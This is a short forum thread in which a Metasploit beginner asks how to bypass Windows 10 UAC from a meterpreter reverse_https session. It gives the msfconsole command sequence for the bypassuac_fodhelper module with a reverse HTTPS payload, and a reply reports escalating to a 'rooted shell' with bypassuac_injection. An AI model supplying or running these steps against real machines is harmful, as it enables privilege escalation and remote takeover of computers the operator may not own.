p.c00d3r Posted June 27, 2018 Share Posted June 27, 2018 Hello, I am new in metasploit. I am using windows/meterpreter/reverse_https. How can I bypass UAC using exploits like fodhelper/injection etc.. I can bypass using local/ask.But it's not a good one. Thanks. Quote Link to comment Share on other sites More sharing options...
theUNK0WN Posted June 28, 2018 Share Posted June 28, 2018 If you're unable to bypass UAC through msf, 9/10 you'll have to gain physical access to escalate privs. What windows version are you testing this on? I can try and see if I can find a work-around without physical access. Quote Link to comment Share on other sites More sharing options...
p.c00d3r Posted June 29, 2018 Author Share Posted June 29, 2018 WINDOWS 10 x64. I tried bypassuac_injection/bypassuac_fodhelper/bypassuac_injection_xSS. May be I tried the wrong commands. use windows/local/bypassuac_fodhelper set SESSION set PAYLOAD windows/meterpreter/reverse_https set LHOST set LPORT run Quote Link to comment Share on other sites More sharing options...
theUNK0WN Posted June 30, 2018 Share Posted June 30, 2018 Hey, so I was I able to escalate privs (on a Windows 8 x86 machine; I don't have a windows 10 test machine yet ....) by using "bypassuac_injection" and instantly obtained a rooted shell. I wasn't able to find the "bypassuac_injection_xSS" in msf and fodhelper isn't useful as the target machine isn't vulnerable to it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.